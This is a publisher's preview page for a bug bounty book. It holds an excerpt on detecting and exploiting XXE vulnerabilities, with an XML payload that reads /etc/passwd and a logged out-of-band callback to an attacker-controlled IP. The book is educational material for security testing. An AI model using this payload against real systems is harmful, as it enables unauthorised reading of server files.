Book Image

Bug Bounty Hunting Essentials

By : Carlos A. Lozano, Shahmeer Amir
Book Image

Bug Bounty Hunting Essentials

By: Carlos A. Lozano, Shahmeer Amir

Overview of this book

Bug bounty programs are the deals offered by prominent companies where-in any white-hat hacker can find bugs in the applications and they will have a recognition for the same. The number of prominent organizations having this program has increased gradually leading to a lot of opportunity for Ethical Hackers. This book will initially start with introducing you to the concept of Bug Bounty hunting. Then we will dig deeper into concepts of vulnerabilities and analysis such as HTML injection, CRLF injection and so on. Towards the end of the book, we will get hands-on experience working with different tools used for bug hunting and various blogs and communities to be followed. This book will get you started with bug bounty hunting and its fundamentals.
Table of Contents (20 chapters)
Title Page
Copyright and Credits
About Packt
Contributors
Preface
Index

Detecting and exploiting an XXE


The process to detect this kind vulnerability in general is as follows:

  • If it's possible, download an XML document generated by the application so you know the structure. If not, create a simple template, like this:
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [ 
<!ELEMENT foo ANY > 
<!ENTITY xxe SYSTEM "file:///etc/passwd" > 
] 
> 
<foo>&xxe;</foo> 
  • See if it's possible to add a reference to a resource; a good trick that's commonly used by attackers is to generate a reverse response that could be captured in a server where we have control—something like this:
GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
  • If it's not possible to add an external reference, but you receive an error, modify the request and submit tags:
<cosa></cosa> 

To test. If the error disappears, it means that the parser is accepting the tags as valid, so it might be vulnerable.

  • Also, you can try entering data before or in...